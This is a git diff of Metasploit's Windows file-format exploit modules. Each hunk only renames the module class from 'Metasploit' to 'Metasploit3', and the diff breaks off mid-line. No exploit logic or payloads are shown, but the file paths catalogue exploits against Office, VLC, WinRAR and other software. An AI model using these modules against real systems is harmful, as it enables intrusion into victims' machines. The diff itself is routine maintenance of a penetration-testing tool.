b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index 4bb35c4616..a0786b7cfc 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/ole' require 'rex/ole/util' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 087723a9e5..7e68750c0f 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 22eaee8a22..be1f865651 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 3cabed1bd6..52709c9794 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index 09cf163c39..e524c4a34b 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_017_rtf.rb b/modules/exploits/windows/fileformat/ms14_017_rtf.rb index 6826c4aa9c..178fd02774 100644 --- a/modules/exploits/windows/fileformat/ms14_017_rtf.rb +++ b/modules/exploits/windows/fileformat/ms14_017_rtf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb index b2f579d334..12a76d2f09 100644 --- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index 73608729a3..da08b259a5 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb index f40eac4b91..2fae749a3d 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index fa50c07f1e..66df942f10 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index a59e6bbe34..9815d96b34 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index fe08afb898..f0b5395668 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index fd0e908a15..3715060fab 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -25,7 +25,7 @@ end end -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index aff42f0083..91ec7bd6be 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index e4aad84b4e..2de0c93213 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index 999674ef33..a16320bc27 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 2a2baca5a8..076e614bb2 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb index 48baa401b4..ad26ef2fbd 100644 --- a/modules/exploits/windows/fileformat/openoffice_ole.rb +++ b/modules/exploits/windows/fileformat/openoffice_ole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 157126e2e0..75ed8cc4d3 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index 79e06e326a..dd958d8620 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb index 92ed62510d..202fb38aba 100644 --- a/modules/exploits/windows/fileformat/ovf_format_string.rb +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index c5e505bd3b..fdd269942b 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb index 332310a977..7b5f803269 100644 --- a/modules/exploits/windows/fileformat/proshow_load_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/publishit_pui.rb b/modules/exploits/windows/fileformat/publishit_pui.rb index 24c510ae2a..6a260b10df 100644 --- a/modules/exploits/windows/fileformat/publishit_pui.rb +++ b/modules/exploits/windows/fileformat/publishit_pui.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 6c11c1db5a..0c922c9fd1 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 73d73a064c..861ac3d898 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb index 08d8b91d74..c3012abef6 100644 --- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index ee40744bc2..51179b1675 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index c19ec3c972..7dcc8d9617 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 83b6dcae99..23358f9ad6 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb index 9cb7c70ce9..a4676e030b 100644 --- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb +++ b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index 061c4a8a3c..f4fb8022de 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index f758571201..1d79f124e1 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb index 06a5cfa452..476b0ed1ae 100644 --- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index e191240543..736e5311c5 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 9a32aea0ce..5f822b0dae 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index f5c56d351d..2ddbf829a4 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index 42308fd594..5c706c6424 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 23be893138..8c4f170b83 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index d3a9a70204..c6bd57e032 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb index f2be8d2285..68cbfde4ef 100644 --- a/modules/exploits/windows/fileformat/videocharge_studio.rb +++ b/modules/exploits/windows/fileformat/videocharge_studio.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index f38dea367a..42b4cb395e 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index bcd5989758..337be73d0c 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 581f955edd..0a35ce8bce 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index 25dc57ad07..b9474d67e7 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index ee16c22573..0e83aa1d3e 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index fed132db60..4048200658 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 43e8776f1b..cab592fca2 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index 18aec0b499..dac5f66d9a 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index ce9ab77ee5..6169941ed8 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index 1364d0940e..4589c909f9 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index 094052559e..af6a94c36b 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index 9e45f10293..0ee6a6a64b 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb index 23acce86d0..21385fe87f 100644 --- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb +++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index ded4c117c6..7727f18446 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 2351581ad2..614d173074 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 59073b55af..0c6ee32cda 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index 7ee0266872..e6f7b78680 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index 19a31f92b8..9e217df2a7 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index 1a5207fa8d..a70e7da10a 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index d42815f200..d3a93a3cfa 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = 